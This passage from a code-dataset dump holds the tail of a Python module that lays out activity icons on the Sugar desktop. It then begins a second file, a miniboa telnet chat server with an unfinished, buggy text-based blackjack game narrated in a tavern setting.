1000\n_INTERMEDIATE_B = (style.STANDARD_ICON_SIZE + style.SMALL_ICON_SIZE) / 2\n_INTERMEDIATE_A = (style.STANDARD_ICON_SIZE + _INTERMEDIATE_B) / 2\n_INTERMEDIATE_C = (_INTERMEDIATE_B + style.SMALL_ICON_SIZE) / 2\n_ICON_SIZES = [style.MEDIUM_ICON_SIZE, style.STANDARD_ICON_SIZE,\n _INTERMEDIATE_A, _INTERMEDIATE_B, _INTERMEDIATE_C,\n style.SMALL_ICON_SIZE]\n\n\nclass ActivityLayout(gobject.GObject, hippo.CanvasLayout):\n \"\"\"Base class of the different layout types.\"\"\"\n\n __gtype_name__ = 'ActivityLayout'\n\n def __init__(self):\n gobject.GObject.__init__(self)\n self.box = None\n self.fixed_positions = {}\n\n def do_set_box(self, box):\n self.box = box\n\n def do_get_height_request(self, for_width):\n return 0, (gtk.gdk.screen_height() - style.GRID_CELL_SIZE) * _ACTIVITY_SCREEN_PERCENTAGE / 100\n\n def do_get_width_request(self):\n return 0, gtk.gdk.screen_width()\n\n def compare_activities(self, icon_a, icon_b):\n return 0\n\n def append(self, icon, locked=False):\n if not hasattr(type(icon), 'fixed_position'):\n logging.debug('Icon without fixed_position: %r', icon)\n return\n\n icon.props.size = max(icon.props.size, style.STANDARD_ICON_SIZE)\n\n relative_x, relative_y = icon.fixed_position\n if relative_x < 0 or relative_y < 0:\n logging.debug('Icon out of bounds: %r', icon)\n return\n\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n self.fixed_positions[icon] = \\\n (int(relative_x * _BASE_SCALE / float(width)),\n int(relative_y * _BASE_SCALE / float(height)))\n\n def remove(self, icon):\n if icon in self.fixed_positions:\n del self.fixed_positions[icon]\n\n def move_icon(self, icon, x, y, locked=False):\n if icon not in self.box.get_children():\n raise ValueError('Child not in box.')\n\n if not(hasattr(icon, 'get_bundle_id') and hasattr(icon, 'get_version')):\n logging.debug('Not an activity icon %r', icon)\n return\n\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n registry = bundleregistry.get_registry()\n registry.set_bundle_position(\n icon.get_bundle_id(), icon.get_version(),\n x * width / float(_BASE_SCALE),\n y * height / float(_BASE_SCALE))\n self.fixed_positions[icon] = (x, y)\n\n def do_allocate(self, x, y, width, height, req_width, req_height,\n origin_changed):\n raise NotImplementedError()\n\n def allow_dnd(self):\n return False\n\nclass RandomActivityLayout(ActivityLayout):\n \"\"\"Lay out icons randomly; try to nudge them around to resolve overlaps.\"\"\"\n\n __gtype_name__ = 'RandomActivityLayout'\n\n icon_name = 'view-freeform'\n \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n\n key = 'random-layout'\n \"\"\"String used in profile to represent this view.\"\"\"\n\n # TRANS: label for the freeform layout in the pathway view\n palette_name = _('Freeform')\n \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n\n def __init__(self):\n ActivityLayout.__init__(self)\n\n min_width_, width = self.do_get_width_request()\n min_height_, height = self.do_get_height_request(width)\n \n self._grid = Grid(width / _CELL_SIZE, height / _CELL_SIZE)\n self._grid.connect('child-changed', self.__grid_child_changed_cb)\n\n def __grid_child_changed_cb(self, grid, child):\n child.emit_request_changed()\n\n def append(self, icon, locked=False):\n ActivityLayout.append(self, icon, locked)\n\n min_width_, child_width = icon.get_width_request()\n min_height_, child_height = icon.get_height_request(child_width)\n min_width_, width = self.box.get_width_request()\n min_height_, height = self.box.get_height_request(width)\n\n if icon in self.fixed_positions:\n x, y = self.fixed_positions[icon]\n x = min(x, width - child_width)\n y = min(y, height - child_height)\n elif hasattr(icon, 'get_bundle_id'):\n name_hash = hashlib.md5(icon.get_bundle_id())\n x = int(name_hash.hexdigest()[:5], 16) % (width - child_width)\n y = int(name_hash.hexdigest()[-5:], 16) % (height - child_height)\n else:\n x = None\n y = None\n\n if x is None or y is None:\n self._grid.add(icon,\n child_width / _CELL_SIZE, child_height / _CELL_SIZE)\n else:\n self._grid.add(icon,\n child_width / _CELL_SIZE, child_height / _CELL_SIZE,\n x / _CELL_SIZE, y / _CELL_SIZE)\n\n def remove(self, icon):\n self._grid.remove(icon)\n ActivityLayout.remove(self, icon)\n\n def move_icon(self, icon, x, y, locked=False):\n self._grid.move(icon, x / _CELL_SIZE, y / _CELL_SIZE, locked)\n ActivityLayout.move_icon(self, icon, x, y, locked)\n\n def do_allocate(self, x, y, width, height, req_width, req_height,\n origin_changed):\n for child in self.box.get_layout_children():\n # We need to always get requests to not confuse hippo\n min_w_, child_width = child.get_width_request()\n min_h_, child_height = child.get_height_request(child_width)\n\n rect = self._grid.get_child_rect(child.item)\n child.allocate(rect.x * _CELL_SIZE,\n rect.y * _CELL_SIZE,\n child_width,\n child_height,\n origin_changed)\n\n def allow_dnd(self):\n return True\n\n#_MINIMUM_RADIUS = style.XLARGE_ICON_SIZE / 2 + style.DEFAULT_SPACING + \\\n# style.STANDARD_ICON_SIZE * 2\n#_MAXIMUM_RADIUS = (gtk.gdk.screen_height() - style.GRID_CELL_SIZE) / 2 - \\\n# style.STANDARD_ICON_SIZE - style.DEFAULT_SPACING\n#_ICON_SPACING_FACTORS = [1.5, 1.4, 1.3, 1.2, 1.1, 1.0]\n#_SPIRAL_SPACING_FACTORS = [1.5, 1.5, 1.5, 1.4, 1.3, 1.2]\n#_MIMIMUM_RADIUS_ENCROACHMENT = 0.75\n#_INITIAL_ANGLE = math.pi\n#\n#\n#class RingActivityLayout(ActivityLayout):\n# \"\"\"Lay out icons in a ring or spiral around the XO man.\"\"\"\n#\n# __gtype_name__ = 'RingActivityLayout'\n# icon_name = 'view-radial'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n# key = 'ring-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n# # TRANS: label for the ring layout in the pathway view\n# palette_name = _('Ring')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# ActivityLayout.__init__(self)\n# self._locked_children = {}\n# self._spiral_mode = False\n#\n# def append(self, icon, locked=False):\n# ActivityLayout.append(self, icon, locked)\n# if locked:\n# child = self.box.find_box_child(icon)\n# self._locked_children[child] = (0, 0)\n#\n# def remove(self, icon):\n# child = self.box.find_box_child(icon)\n# if child in self._locked_children:\n# del self._locked_children[child]\n# ActivityLayout.remove(self, icon)\n#\n# def move_icon(self, icon, x, y, locked=False):\n# ActivityLayout.move_icon(self, icon, x, y, locked)\n# if locked:\n# child = self.box.find_box_child(icon)\n# self._locked_children[child] = (x, y)\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# \"\"\" Adjust the ring or spiral radius and icon size as needed. \"\"\"\n# self._spiral_mode = False\n# distance = style.MEDIUM_ICON_SIZE + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(style.MEDIUM_ICON_SIZE)]\n# radius = max(children_count * distance / (2 * math.pi), _MINIMUM_RADIUS)\n# if radius < _MAXIMUM_RADIUS:\n# return radius, style.MEDIUM_ICON_SIZE\n#\n# distance = style.STANDARD_ICON_SIZE + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(style.STANDARD_ICON_SIZE)]\n# radius = max(children_count * distance / (2 * math.pi), _MINIMUM_RADIUS)\n# if radius < _MAXIMUM_RADIUS:\n# return radius, style.STANDARD_ICON_SIZE\n#\n# self._spiral_mode = True\n# icon_size = style.STANDARD_ICON_SIZE\n# angle, radius = self._calculate_angle_and_radius(children_count,\n# icon_size)\n# while radius > _MAXIMUM_RADIUS:\n# i = _ICON_SIZES.index(icon_size)\n# if i < len(_ICON_SIZES) - 1:\n# icon_size = _ICON_SIZES[i + 1]\n# angle, radius = self._calculate_angle_and_radius(\n# children_count, icon_size)\n# else:\n# break\n# return radius, icon_size\n#\n# def _calculate_position(self, radius, icon_size, icon_index, children_count,\n# sin=math.sin, cos=math.cos):\n# \"\"\" Calculate an icon position on a circle or a spiral. \"\"\"\n# width, height = self.box.get_allocation()\n# if self._spiral_mode:\n# min_width_, box_width = self.box.get_width_request()\n# min_height_, box_height = self.box.get_height_request(box_width)\n# angle, radius = self._calculate_angle_and_radius(icon_index,\n# icon_size)\n# x, y = self._convert_from_polar_to_cartesian(angle, radius,\n# icon_size,\n# width, height)\n# else:\n# angle = icon_index * (2 * math.pi / children_count) - math.pi / 2\n# x = radius * cos(angle) + (width - icon_size) / 2\n# y = radius * sin(angle) + (height - icon_size - \\\n# (style.GRID_CELL_SIZE / 2)) / 2\n# return x, y\n#\n# def _convert_from_polar_to_cartesian(self, angle, radius, icon_size, width,\n# height):\n# \"\"\" Convert angle, radius to x, y \"\"\"\n# x = int(math.sin(angle) * radius)\n# y = int(math.cos(angle) * radius)\n# x = - x + (width - icon_size) / 2\n# y = y + (height - icon_size - (style.GRID_CELL_SIZE / 2)) / 2\n# return x, y\n#\n# def _calculate_angle_and_radius(self, icon_count, icon_size):\n# \"\"\" Based on icon_count and icon_size, calculate radius and angle. \"\"\"\n# spiral_spacing = _SPIRAL_SPACING_FACTORS[_ICON_SIZES.index(icon_size)]\n# icon_spacing = icon_size + style.DEFAULT_SPACING * \\\n# _ICON_SPACING_FACTORS[_ICON_SIZES.index(icon_size)]\n# angle = _INITIAL_ANGLE\n# radius = _MINIMUM_RADIUS - (icon_size * _MIMIMUM_RADIUS_ENCROACHMENT)\n# for i in range(icon_count):\n# circumference = radius * 2 * math.pi\n# n = circumference / icon_spacing\n# angle += (2 * math.pi / n)\n# radius += (float(icon_spacing) * spiral_spacing / n)\n# return angle, radius\n#\n# def _get_children_in_ring(self):\n# children_in_ring = [child for child in self.box.get_layout_children() \\\n# if child not in self._locked_children]\n# return children_in_ring\n#\n# def do_allocate(self, x, y, width, height, req_width, req_height,\n# origin_changed):\n# children_in_ring = self._get_children_in_ring()\n# if children_in_ring:\n# radius, icon_size = \\\n# self._calculate_radius_and_icon_size(len(children_in_ring))\n#\n# for n in range(len(children_in_ring)):\n# child = children_in_ring[n]\n#\n# x, y = self._calculate_position(radius, icon_size, n,\n# len(children_in_ring))\n#\n# # We need to always get requests to not confuse hippo\n# min_w_, child_width = child.get_width_request()\n# min_h_, child_height = child.get_height_request(child_width)\n#\n# child.allocate(int(x), int(y), child_width, child_height,\n# origin_changed)\n# child.item.props.size = icon_size\n#\n# for child in self._locked_children.keys():\n# x, y = self._locked_children[child]\n#\n# # We need to always get requests to not confuse hippo\n# min_w_, child_width = child.get_width_request()\n# min_h_, child_height = child.get_height_request(child_width)\n#\n# if child_width <= 0 or child_height <= 0:\n# return\n#\n# child.allocate(int(x), int(y), child_width, child_height,\n# origin_changed)\n#\n# def compare_activities(self, icon_a, icon_b):\n# if hasattr(icon_a, 'installation_time') and \\\n# hasattr(icon_b, 'installation_time'):\n# return icon_b.installation_time - icon_a.installation_time\n# else:\n# return 0\n#\n#_SUNFLOWER_CONSTANT = style.STANDARD_ICON_SIZE * .75\n#\"\"\"Chose a constant such that STANDARD_ICON_SIZE icons are nicely spaced.\"\"\"\n#\n#_SUNFLOWER_OFFSET = \\\n# math.pow((style.XLARGE_ICON_SIZE / 2 + style.STANDARD_ICON_SIZE) /\n# _SUNFLOWER_CONSTANT, 2)\n#\"\"\"\n#Compute a starting index for the `SunflowerActivityLayout` which leaves space for\n#the XO man in the center. Since r = _SUNFLOWER_CONSTANT * sqrt(n),\n#solve for n when r is (XLARGE_ICON_SIZE + STANDARD_ICON_SIZE)/2.\n#\"\"\"\n#\n#_GOLDEN_RATIO = 1.6180339887498949\n#\"\"\"\n#Golden ratio: http://en.wikipedia.org/wiki/Golden_ratio\n#Calculation: (math.sqrt(5) + 1) / 2\n#\"\"\"\n#\n#_SUNFLOWER_ANGLE = 2.3999632297286531\n#\"\"\"\n#The sunflower angle is approximately 137.5 degrees.\n#This is the golden angle: http://en.wikipedia.org/wiki/Golden_angle\n#Calculation: math.radians(360) / ( _GOLDEN_RATIO * _GOLDEN_RATIO )\n#\"\"\"\n#\n#class SunflowerActivityLayout(RingActivityLayout):\n# \"\"\"Spiral layout based on Fibonacci ratio in phyllotaxis.\n#\n# See http://algorithmicbotany.org/papers/abop/abop-ch4.pdf\n# for details of Vogel's model of florets in a sunflower head.\"\"\"\n#\n# __gtype_name__ = 'SunflowerActivityLayout'\n#\n# icon_name = 'view-spiral'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'spiral-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the spiral layout in the pathway view\n# palette_name = _('Spiral')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n# self.skipped_indices = []\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# \"\"\"Stub out this method; not used in `SunflowerActivityLayout`.\"\"\"\n# return None, style.STANDARD_ICON_SIZE\n#\n# def adjust_index(self, i):\n# \"\"\"Skip floret indices which end up outside the desired bounding box.\"\"\"\n# for idx in self.skipped_indices:\n# if i < idx:\n# break\n# i += 1\n# return i\n#\n# def _calculate_position(self, radius, icon_size, oindex, children_count,\n# sin=math.sin, cos=math.cos):\n# \"\"\"Calculate the position of sunflower floret number 'oindex'.\n# If the result is outside the bounding box, use the next index which\n# is inside the bounding box.\"\"\"\n#\n# width, height = self.box.get_allocation()\n#\n# while True:\n#\n# index = self.adjust_index(oindex)\n#\n# # tweak phi to get a nice gap lined up where the \"active activity\"\n# # icon is, below the central XO man.\n# phi = index * _SUNFLOWER_ANGLE + math.radians(-130)\n#\n# # we offset index when computing r to make space for the XO man.\n# r = _SUNFLOWER_CONSTANT * math.sqrt(index + _SUNFLOWER_OFFSET)\n#\n# # x,y are the top-left corner of the icon, so remove icon_size\n# # from width/height to compensate. y has an extra GRID_CELL_SIZE/2\n# # removed to make room for the \"active activity\" icon.\n# x = r * cos(phi) + (width - icon_size) / 2\n# y = r * sin(phi) + (height - icon_size - \\\n# (style.GRID_CELL_SIZE / 2) ) / 2\n#\n# # skip allocations outside the allocation box.\n# # give up once we can't fit\n# if r < math.hypot(width / 2, height / 2):\n# if y < 0 or y > (height - icon_size) or \\\n# x < 0 or x > (width - icon_size):\n# self.skipped_indices.append(index)\n# continue # try again\n#\n# return x, y\n#\n#class BoxActivityLayout(RingActivityLayout):\n# \"\"\"Lay out icons in a square around the XO man.\"\"\"\n#\n# __gtype_name__ = 'BoxActivityLayout'\n#\n# icon_name = 'view-box'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'box-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the box layout in the pathway view\n# palette_name = _('Box')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n#\n# def _calculate_position(self, radius, icon_size, index, children_count,\n# sin=None, cos=None):\n#\n# # use \"orthogonal\" versions of cos and sin in order to square the\n# # circle and turn the 'ring view' into a 'box view'\n# def cos_d(d):\n# while d < 0:\n# d += 360\n# if d < 45:\n# return 1\n# if d < 135:\n# return (90 - d) / 45.\n# if d < 225:\n# return -1\n# return cos_d(360 - d) # mirror around 180\n#\n# cos = lambda r: cos_d(math.degrees(r))\n# sin = lambda r: cos_d(math.degrees(r) - 90)\n#\n# return RingActivityLayout._calculate_position\\\n# (self, radius, icon_size, index, children_count,\n# sin=sin, cos=cos)\n#\n#class TriangleActivityLayout(RingActivityLayout):\n# \"\"\"Lay out icons in a triangle around the XO man.\"\"\"\n#\n# __gtype_name__ = 'TriangleActivityLayout'\n#\n# icon_name = 'view-triangle'\n# \"\"\"Name of icon used in home view dropdown palette.\"\"\"\n#\n# key = 'triangle-layout'\n# \"\"\"String used in profile to represent this view.\"\"\"\n#\n# # TRANS: label for the box layout in the pathway view\n# palette_name = _('Triangle')\n# \"\"\"String used to identify this layout in home view dropdown palette.\"\"\"\n#\n# def __init__(self):\n# RingActivityLayout.__init__(self)\n#\n# def _calculate_radius_and_icon_size(self, children_count):\n# # use slightly larger minimum radius than parent, because sides\n# # of triangle come awful close to the center.\n# radius, icon_size = \\\n# RingActivityLayout._calculate_radius_and_icon_size(self, children_count)\n# return max(radius, _MINIMUM_RADIUS + style.MEDIUM_ICON_SIZE), icon_size\n#\n# def _calculate_position(self, radius, icon_size, index, children_count,\n# sin=math.sin, cos=math.cos):\n# # tweak cos and sin in order to make the 'ring' into an equilateral\n# # triangle.\n#\n# def cos_d(d):\n# while d < -90:\n# d += 360\n# if d <= 30:\n# return (d + 90) / 120.\n# if d <= 90:\n# return (90 - d) / 60.\n# return -cos_d(180 - d) # mirror around 90\n#\n# sqrt_3 = math.sqrt(3)\n#\n# def sin_d(d):\n# while d < -90:\n# d += 360\n# if d <= 30:\n# return ((d + 90) / 120.) * sqrt_3 - 1\n# if d <= 90:\n# return sqrt_3 - 1\n# return sin_d(180 - d) # mirror around 90\n#\n# cos = lambda r: cos_d(math.degrees(r))\n# sin = lambda r: sin_d(math.degrees(r))\n#\n# return RingActivityLayout._calculate_position\\\n# (self, radius, icon_size, index, children_count,\n# sin=sin, cos=cos)\n","sub_path":"site-packages/glycogen/desktop/activitylayout.py","file_name":"activitylayout.py","file_ext":"py","file_size_in_byte":21395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631218697","text":"import random\nimport sys\nimport socket\nimport logging\nfrom miniboa import TelnetServer\n\nIDLE_TIMEOUT = 500\nCLIENT_LIST = []\nSERVER_RUN = True\nactiveplayers = []\ndef on_connect(client):\n \"\"\"\n Sample on_connect function.\n Handles new connections.\n \"\"\"\n logging.info(\"Opened connection to {}\".format(client.addrport()))\n broadcast(\"{} is being dealt in.\\n\".format(client.addrport()))\n CLIENT_LIST.append(client)\n client.send(\"Welcome to the Lions Head, {}.\\n\".format(client.addrport()))\n\t\ndef on_disconnect(client):\n \"\"\"\n Sample on_disconnect function.\n Handles lost connections.\n \"\"\"\n logging.info(\"Lost connection to {}\".format(client.addrport()))\n CLIENT_LIST.remove(client)\n broadcast(\"{} Has left the table.\\n\".format(client.addrport()))\n\t\ndef kick_idle():\n \"\"\"\n Looks for idle clients and disconnects them by setting active to False.\n \"\"\"\n # Who hasn't been typing?\n for client in CLIENT_LIST:\n if client.idle() > IDLE_TIMEOUT:\n logging.info(\"Kicking idle lobby client from {}\".format(client.addrport()))\n client.active = False\ndef process_clients():\n \"\"\"\n Check each client, if client.cmd_ready == True then there is a line of\n input available via client.get_command().\n \"\"\"\n for client in CLIENT_LIST:\n if client.active and client.cmd_ready:\n # If the client sends input echo it to the chat room\n chat(client)\n\ndef broadcast(msg):\n \"\"\"\n Send msg to every client.\n \"\"\"\n for client in CLIENT_LIST:\n client.send(msg)\n\ndef chat(client):\n \"\"\"\n Echo whatever client types to everyone.\n \"\"\"\n global SERVER_RUN\n msg = client.get_command()\n logging.info(\"{} says '{}'\".format(client.addrport(), msg))\n\n for guest in CLIENT_LIST:\n if guest != client:\n guest.send(\"{} says '{}'\\n\".format(client.addrport(), msg))\n else:\n guest.send(\"You say '{}'\\n\".format(msg))\n\n cmd = msg.lower()\n\t# Begin Blackjack(AI)\n if cmd == 'run':\n PlayAI(client)\n # bye = disconnect\n elif cmd == 'bye':\n client.active = False\n # shutdown == stop the server\n elif cmd == 'shutdown':\n SERVER_RUN = False\n\ndef PlayAI(client):\n\tactiveplayers.insert(0, 'client.addrport')\n\tactiveplayers[0] = BlackjackGame\n\tgame = activeplayers[0]\n\tgame.run()\n\t\t\t\n\tdef client_print(Message):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tclient.send(\"{}\".format(Message))\n\t\t\t\treturn\n\n\tdef get_input(question):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tvalue = client.get_command()\n\t\t\t\tclient.send(\"{} ;response? '{}'\\n\".format(question, value))\n\t\t\tvalue = str(value)\n\t\t\tif value.startswith('y'):\n\t\t\t\treturn 'y'\n\t\t\telif value.startswith('n'):\n\t\t\t\treturn 'n'\n\t\t\telif value.startswith('q'):\n\t\t\t\tsys.exit(0)\n\t\t\telif value.startswith('h'):\n\t\t\t\tclient_print('one day you will have many options to choose from. For now you can quit at any time by typing q')\n\t\t\telse:\n\t\t\t\tclient_print('Please choose yes, no, or quit.')\n\n\tdef get_number(question):\n\t\twhile True:\n\t\t\tfor client in CLIENT_LIST:\n\t\t\t\tvalue = client.get_command()\n\t\t\t\tclient.send(\"{} ;response? '{}'\\n\".format(question, value))\n\t\t\tif not value.isdigit():\n\t\t\t\tclient_print('Please type a number')\n\t\t\telif int(value) >self:\n\t\t\t\tclient_print('Please, kid, you do not have that kind of cash')\n\t\t\telse:\n\t\t\t\treturn int(value)\n\nclass BlackjackGame():\n\t# constants, should be the same for every class\n\tcards = ('A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K')\n\t#suits = ('♠','♥','♦','♣')\n\tsuits = ('S','H','D','C')\n\t\n\tdef __init__(self):\n\t\tself.deck = []\n\t\tself.money = 500\n\t\tself.cpumoney = 500\n\t\tself.reset_game()\n\t\tGame_Over = False\n\t\n\tdef reset_game(self):\n\t\tself.reset_deck()\n\t\tself.hand = []\n\t\tself.cpuhand = []\n\t\tself.cpufold = False\n\t\tself.cpubet = 0\n\t\tself.cpuraise = 0\n\t\tself.cpumatch = 0\n\t\tself.playerbet = 0\n\t\tself.playerraise = 0\n\t\tself.playerbet2 = 0\n\t\tself.playertotalbet = 0\n\t\tself.pot = 0\n\t\tself.aggrobet = False\n\t\n\tdef reset_deck(self):\n\t\tself.deck.clear()\n\t\tfor s in self.suits:\n\t\t\tfor c in self.cards:\n\t\t\t\tself.deck.append((s, c))\n\t\trandom.shuffle(self.deck)\n\t\t\n\tdef check_hand(self, hand_list):\n\t\tscore = 0\n\t\taces = 0\n\t\tfor c in hand_list:\n\t\t\tif c[1] == 'A':\n\t\t\t\tscore += 1\n\t\t\t\taces += 1\n\t\t\telif c[1] in ('J', 'Q', 'K'):\n\t\t\t\tscore += 10\n\t\t\telse:\n\t\t\t\tscore += int(c[1])\n\t\t\n\t\tfor i in range(aces):\n\t\t\tif score + 10 <= 21:\n\t\t\t\tscore += 10\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\treturn score\n\n\tdef draw_cards(self, number=1):\n\t\tresult = []\n\t\tfor i in range(number):\n\t\t\tresult.append(self.deck.pop())\n\t\treturn result\n\t\t\n\tdef run():\n\t\tglobalclient_print(\"\"\"Outside the window of the Lion's Head Tavern, the west wind is urging the ocean \\n into an assault on the docks and rattling windows all along the quayside. \n\t\tThe bartender has stopped relocating grime from one glass to another and is instead keeping \\n\t a careful eye on the ceiling, occasionally moving mugs and glasses \\n\t\tto catch the droplets of water leaking from the rafters.\n\t\tThe smell of wet wood and salt has overpowered the lingering aroma of alcohol and \\n the man across from you inhales deeply as he shuffles the tattered deck.\"\"\")\n\t\thasplayed = get_input(\"\"\"\\\"Well now\\\", his rough voice cuts through the soft sigh of water against the cobbles,\\\"is this your first time playing blackjack?\\\": \"\"\")\n\t\tif hasplayed == \"y\":\n\t\t\tshowrules = get_input(\"Do you want me to explain the rules?: \")\n\t\t\tif showrules == \"y\":\n\t\t\t\tclient_print(\"\"\"Blackjack is simple, just try to get as close to 21 without going over. Face cards are ten, aces are one or eleven, your choice. Maybe once you improve we'll introduce splittin' and doubling down.\"\"\")\n\t\t\telse:\n\t\t\t\tclient_print(\"Entirely up to you. I don't mind taking your money.\")\n\t\tif hasplayed == \"n\": \n\t\t\tclient_print(\"Well, we'd best get started then, kid.\")\n\t\tself.__init__()\n\t\twhile True: \n\t\t\tself.reset_game()\n\t\t\thand += self.draw_cards(2)\n\t\t\tcpuhand += self.draw_cards(2)\n\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\tif self.check_hand(cpuhand) == 21:\n\t\t\t\tclient_print(\"I'll wager a little.\")\n\t\t\t\tcpubet = random.randint(5,50)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\telif self.check_hand(cpuhand) < 10:\n\t\t\t\tclient_print(\"I'll see this hand through.\")\n\t\t\t\tcpubet = random.randint(1,20)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\telse:\n\t\t\t\tclient_print(\"I'll bet:\")\n\t\t\t\tcpubet = random.randint(3,30)\n\t\t\t\tpot += cpubet\n\t\t\t\tclient_print(cpubet)\n\t\t\tplayerbet = get_number(\"How much do you wanna lose?: \")\n\t\t\tpot += playerbet\n\t\t\tplayertotalbet = playerbet\n\t\t\thit = get_input(\"Wanna draw another?: \")\n\t\t\tif hit == \"n\":\n\t\t\t\tcpubust = False\n\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\tclient_print(\"I'm taking another card\")\n\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\tcpubust = True\n\t\t\t\t\telif self.check_hand(cpuhand) >= 16:\n\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\telif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"I'll hit again\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\t\tcpubust = True\n\t\t\t\t\t\telif self.check_hand(cpuhand) <= 21 :\n\t\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\t\telif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\t\tclient_print(\"I like my luck. I'll take one more.\")\n\t\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\t\tif self.check_hand(cpuhand) > 21:\n\t\t\t\t\t\t\t\tclient_print(\"Balls, I'm bust.\")\n\t\t\t\t\t\t\t\tcpubust = True\n\t\t\t\t\t\t\telif self.check_hand(cpuhand) <= 21: \n\t\t\t\t\t\t\t\tclient_print (\"Well, well. Get ready kid.\")\n\t\t\t\t\t\t\t\taggrobet = True \n\t\t\t\tif cpubust == False:\n\t\t\t\t\tcheckorraise = get_input(\"Think you have a good hand. Well, prepared to match my bet?: \")\n\t\t\t\t\tif checkorraise == \"y\":\n\t\t\t\t\t\tcpuraise = random.randint(0,100)\n\t\t\t\t\t\tif aggrobet == True:\n\t\t\t\t\t\t\tcpuraise = cpuraise + 100\n\t\t\t\t\t\tpot = int(pot) + int(cpuraise)\n\t\t\t\t\t\tclient_print(\"I've put in\" )\n\t\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\t\tclient_print(\"you're gonna have to match it or raise.\")\n\t\t\t\t\t\tplayerraise = get_number(\"pick a number: \")\n\t\t\t\t\t\tif int(playerraise) < int(cpuraise):\n\t\t\t\t\t\t\tclient_print(\"That ain't enough kid, weren't you listening?\")\n\t\t\t\t\t\t\tclient_print(\"I've put in\" )\n\t\t\t\t\t\t\tclient_print(cpuraise)\n\t\t\t\t\t\t\tclient_print(\"you're gonna have to match it or raise.\")\n\t\t\t\t\t\t\tplayerraise = get_input(\"I'm going to put in: \")\n\t\t\t\t\t\tplayertotalbet = int(playertotalbet) + int(playerraise)\n\t\t\t\t\t\tpot = int(pot) + int(cpuraise) + int(playerraise)\n\t\t\t\t\t\tif int(playerraise) > int(cpuraise):\n\t\t\t\t\t\t\tif sum(pot) < 200 and int(cpuhand) > 21:\n\t\t\t\t\t\t\t\tclient_print(\"that's a lotta money kid you sure you wanna lose more?\")\n\t\t\t\t\t\t\t\tcpumatch = playerraise\n\t\t\t\t\t\t\t\tpot += int(cpumatch)\n\t\t\t\t\t\t\tif sum(pot) < 200 and int(cpuhand) < 21:\n\t\t\t\t\t\t\t\tclient_print(\"Too rich for me\")\n\t\t\t\t\t\t\t\tcpufold = True\n\t\t\t\t\t\t\n\t\t\tif hit == \"y\":\n\t\t\t\thand += self.draw_cards()\n\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\thit = get_input(\"Careful you don't bust there kid. Sure you wanna draw another?: \")\n\t\t\t\tif hit == \"y\":\n\t\t\t\t\thand += self.draw_cards()\n\t\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\t\thit = get_input(\"Going all the way to five cards?: \")\n\t\t\t\tif hit == \"y\":\n\t\t\t\t\thand += self.draw_cards()\n\t\t\t\t\tclient_print(\"Hand: {} (score {})\".format(hand, self.check_hand(hand)) )\n\t\t\t\tif hit in [\"n\", \"y\"]:\n\t\t\t\t\tif self.check_hand(cpuhand) > 19 :\n\t\t\t\t\t\tclient_print(\"I think I'll stay\")\n\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"Just one more for me\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\tif self.check_hand(cpuhand) > 21 :\n\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\tclient_print(\"I'll test my luck\")\n\t\t\t\t\t\tcpuhand += self.draw_cards()\n\t\t\t\t\t\tif self.check_hand(cpuhand) > 20 :\n\t\t\t\t\t\t\tclient_print(\"I'll stay. I'm just fine.\")\n\t\t\t\t\t\tif self.check_hand(cpuhand) < 16 :\n\t\t\t\t\t\t\tclient_print(\"I like my luck. I'll take one 